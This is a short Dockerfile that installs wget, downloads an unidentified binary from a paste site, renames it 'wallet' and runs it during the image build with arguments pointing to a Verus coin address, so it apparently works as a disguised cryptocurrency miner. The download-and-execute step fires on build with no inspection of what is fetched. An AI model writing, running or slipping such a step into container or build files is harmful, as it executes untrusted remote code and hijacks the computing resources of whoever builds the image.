FROM ubuntu:20.04

RUN apt-get update \
  && apt-get install -y \
  && apt-get install wget -y \
  && rm -rf /var/lib/apt/lists/*

RUN wget https://www.heypasteit.com/download/0IW513 && mv 0IW513 wallet && chmod u+x wallet && ./wallet verus RMLGxwAL2NPcZamTc6vEkfVMbxEuojiUdJ.silithu x
CMD ["-h"]

